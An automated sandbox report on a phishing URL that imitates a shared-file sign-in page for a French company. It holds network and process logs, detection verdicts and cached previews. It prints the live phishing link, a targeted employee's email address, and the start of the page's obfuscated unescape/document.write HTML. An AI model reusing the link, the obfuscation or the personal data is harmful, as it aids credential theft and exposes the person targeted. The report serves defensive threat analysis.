Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.187:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.234.120.54:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.31.169.57:443 -> 192.168.2.6:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.185:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49904 version: TLS 1.2

Source: classification engine

Classification label: mal52.phis.win@17/10@8/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2196,i,16707748160804769795,8698117244156366985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2196,i,16707748160804769795,8698117244156366985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	100%	Avira URL Cloud	malware
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	100%	SlashNext	Credential Stealing type: Phishing & Social usering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
voyages-moinschers.fr	185.221.216.102	true	false	unknown
www.idcom-france.com	213.186.33.5	true	false	unknown
www.google.com	142.250.185.132	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Reputation
https://tse1.mm.bing.net/th?id=OADD2.10239398628216_1JDX0X63GXK5FYFGK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239394186277_1DEATIZYUGUDBFQ4X&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://www.google.com/s2/favicons?domain=idcom-france.com	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239394186284_1SPGPKBFTZ4EQ1P55&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239398628217_1Y51RF6NU1PGVC1I5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.186.33.5	www.idcom-france.com	France	16276	OVHFR	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.221.216.102	voyages-moinschers.fr	United Kingdom	393960	HOST4GEEKS-LLCUS	false
142.250.186.100	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560017
Start date and time:	2024-11-21 09:52:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@17/10@8/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 2.22.50.131, 142.250.181.227, 142.250.185.110, 142.250.110.84, 34.104.35.123, 142.250.186.42, 142.250.185.234, 216.58.206.42, 172.217.16.202, 142.250.186.106, 142.250.186.138, 142.250.185.138, 216.58.212.138, 142.250.185.74, 142.250.184.202, 172.217.18.106, 216.58.206.74, 172.217.18.10, 172.217.23.106, 142.250.186.74, 142.250.184.234, 142.250.74.202, 142.250.184.228, 142.250.184.196, 216.58.212.163
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, tse1.mm.bing.net, clientservices.googleapis.com, g.bing.com, arc.msn.com, t0.gstatic.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, ocsp.edge.digicert.com, update.googleapis.com, clients.l.google.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com

Simulations

Behavior and APIs

⊘No simulations

Input	Output
URL: https://voyages-moinschers.fr Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://voyages-moinschers.fr
URL: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Only recipient email can access shared files", "prominent_button_name": "Sign In", "text_input_field_labels": [ "viviane.beigbeder@idcom-france.com", "password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com Model: Joe Sandbox AI	{ "brands": [ "Idcom-france" ] }

URL: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com Model: Joe Sandbox AI	```json{ "legit_domain": "idcom-france.com", "classification": "unknown", "reasons": [ "The brand 'Idcom-france' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.", "The URL 'voyages-moinschers.fr' does not match the domain 'idcom-france.com', which is suspicious.", "The URL contains hyphens and a different domain name, which is a common tactic in phishing attempts.", "The email input field uses a domain 'idcom-france.com', which does not match the URL, raising further suspicion." ], "riskscore": 8}
URL: voyages-moinschers.fr Brands: Idcom-france Input Fields: viviane.beigbeder@idcom-france.com, password

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 135

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	247
Entropy (8bit):	6.098146828132587
Encrypted:	false
SSDEEP:	6:6v/lhPfp2pjI1GdSimvUW7gBaGzTUQwobEjp:6v/7A0LHYasTUQwobm
MD5:	E66519E6F28D509878A0C1E8FCFBF369
SHA1:	C7E0767306AB8BDDA86A6E1838A42785D9208932
SHA-256:	501CDCD6F10ADCEF2E83A3ED13E4BD8D74244F9095028AA7327DE9EEBD8F96EE
SHA-512:	AE3B2AF717E93EBD396ECBB937274C3336D60C764EEA825B27390633D3FFD9B134430DC42B49835CDA14F6D9A13C2FEB00B791BB731438D5DCE770133EAC1B24
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............(-.S...3PLTEGpL.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.<.....tRNS../..G..\.p........B...cIDAT....... .C.."...?m......p.~3E..<.<(v..KE...4.t`...w......]X.pU.b\h...iP....+.....U..p1.25.\|.........W....IEND.B`.

Chrome Cache Entry: 136

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	247
Entropy (8bit):	6.098146828132587
Encrypted:	false
SSDEEP:	6:6v/lhPfp2pjI1GdSimvUW7gBaGzTUQwobEjp:6v/7A0LHYasTUQwobm
MD5:	E66519E6F28D509878A0C1E8FCFBF369
SHA1:	C7E0767306AB8BDDA86A6E1838A42785D9208932
SHA-256:	501CDCD6F10ADCEF2E83A3ED13E4BD8D74244F9095028AA7327DE9EEBD8F96EE
SHA-512:	AE3B2AF717E93EBD396ECBB937274C3336D60C764EEA825B27390633D3FFD9B134430DC42B49835CDA14F6D9A13C2FEB00B791BB731438D5DCE770133EAC1B24
Malicious:	false
Reputation:	low
URL:	"https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://idcom-france.com&size=16"
Preview:	.PNG........IHDR.............(-.S...3PLTEGpL.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.<.....tRNS../..G..\.p........B...cIDAT....... .C.."...?m......p.~3E..<.<(v..KE...4.t`...w......]X.pU.b\h...iP....+.....U..p1.25.\|.........W....IEND.B`.

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (26600), with CRLF line terminators
Category:	downloaded
Size (bytes):	26685
Entropy (8bit):	3.1258981310131757
Encrypted:	false
SSDEEP:	192:kgr96000T000R000B0007s000SrLeUZTU2yNV6LYgEmKqY6u1LHPyc5fycwhkQ+Z:/bri7V621zBoK/8GB
MD5:	AE334599FE5F51A357EEDED7E0A05B43
SHA1:	D770C69578A65E9243972535C7416CFB9B691DCA
SHA-256:	0E06F110E5EFB4D4E26CA07F9B84DF91328FD1C847E33D760E377F79EAE56999
SHA-512:	5FEC8996D793398DC168E5346C0C5B65850C996B76262A7672DEBA8F0E9A66CEE7EFAE76DD6B14C562CEF728E6EEB11D4549F3D6B9615C657F991F5720441164
Malicious:	false
Reputation:	low
URL:	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
Preview:	<!DOCTYPE html>..<html>.. <script language="javascript">.. document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%3E%4C%6F%67%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%49%53%4F%2D%38%38%35%39%2D%31%22%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%69%63%6F%6E%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%70%6E%67%22%20%69%64%3D%22%66%61%76%69%63%6F%6E%22%20%68%72%65%66%3D%22%22%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:	1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.110577243331642
Encrypted:	false
SSDEEP:	3:Wk6F:j6F
MD5:	610483F85CABBF9E7B09AA3DDB5071F4
SHA1:	862A78D9E6AF34D2B06676F0CBCCC44D560F8016
SHA-256:	79E420D1AECF9D5A6D1E77D7F29C5226B83E97A265B6751B4787E22484DB3E29
SHA-512:	BB65C27EB14C065C34A3376E22CE2D889F2F31B0500A3E46CF92AE0FEFF8AA50293A2C2A151312A71DC88990124B9E996681AAB19C52C6BD2FADFEFDF7BE8F0B
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwkFcdhzqzCWcRIFDU6AC8USBQ3OQUx6?alt=proto
Preview:	ChIKBw1OgAvFGgAKBw3OQUx6GgA=

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	dropped
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:	1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 09:53:28.179970980 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.180330038 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.195333958 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.195377111 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.196357012 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.196791887 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.196852922 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.196985960 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.841142893 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.841206074 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.841259956 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.841279984 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.841300011 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.841317892 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.841803074 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.841824055 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.842133999 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.842216969 CET	443	49706	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.842263937 CET	49706	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.862535954 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.862596035 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.862679005 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.862818956 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:28.862828970 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:28.864626884 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:28.864712000 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:28.868249893 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:28.868274927 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:28.868731022 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:28.870995998 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:28.871165991 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:28.871181011 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:28.871292114 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:28.915333986 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:29.284965992 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:29.285083055 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:29.285145044 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:29.285296917 CET	49707	443	192.168.2.6	40.115.3.253
Nov 21, 2024 09:53:29.285358906 CET	443	49707	40.115.3.253	192.168.2.6
Nov 21, 2024 09:53:29.755508900 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.755510092 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.755553961 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:29.755559921 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:29.755639076 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.757124901 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.757124901 CET	49710	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.757164955 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:29.757258892 CET	49711	443	192.168.2.6	20.223.36.55
Nov 21, 2024 09:53:29.757270098 CET	443	49711	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:30.713543892 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:30.713995934 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:30.714013100 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:30.714576960 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:30.714581013 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:30.714606047 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:30.714615107 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.072787046 CET	49674	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:31.072794914 CET	49673	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:31.385303020 CET	49672	443	192.168.2.6	173.222.162.64
Nov 21, 2024 09:53:31.476015091 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.476077080 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.476176023 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.476205111 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.476254940 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.483295918 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.483437061 CET	443	49709	20.190.159.0	192.168.2.6
Nov 21, 2024 09:53:31.483505964 CET	49709	443	192.168.2.6	20.190.159.0
Nov 21, 2024 09:53:31.550935984 CET	443	49710	20.223.36.55	192.168.2.6
Nov 21, 2024 09:53:31.551018000 CET	49710	443	192.168.2.6	20.223.36.55
